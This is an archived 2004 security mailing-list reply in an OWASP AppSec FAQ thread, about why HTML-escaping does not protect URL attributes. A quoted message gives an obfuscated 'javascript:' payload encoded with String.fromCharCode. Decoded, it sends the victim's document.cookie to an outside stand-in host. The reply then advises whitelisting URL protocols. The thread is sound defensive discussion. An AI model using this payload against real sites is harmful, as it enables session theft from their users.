WebApp Sec mailing list archives
Re: [Re: AppSec FAQ at OWASP]
From: Ulf Härnhammar <Ulf.Harnhammar.9485 () student uu se>
Date: Fri, 30 Jan 2004 14:58:32 +0100
Quoting Philippe Prados <pprados () club-internet fr>:
No. It's not correct. With this code : <a href="<%= escapeHTML(url)%>/doc.html">Document</a> The hacker can inject in the variable url the value : javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119 ,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112 ,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101 ,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1 01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62)) and execute a script without <, > or &!
In general, allowing arbitrary protocols in URLs is a mistake. My HTML filter kses (plug, plug) has a whitelisting URL protocol function that only allows certain protocols in URLs. You can tell it to keep http, https, ftp, mailto and news, and remove all others. See http://sourceforge.net/projects/kses for more information. -- Ulf Härnhammar student, Uppsala universitet redaktör, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
Current thread:
- Re: [Re: AppSec FAQ at OWASP] Sangita Pakala (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Omar Ismail (Jan 29)
- <Possible follow-ups>
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Philippe P. (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Philippe Prados (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Ulf Härnhammar (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Omarjan Ismail (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 30)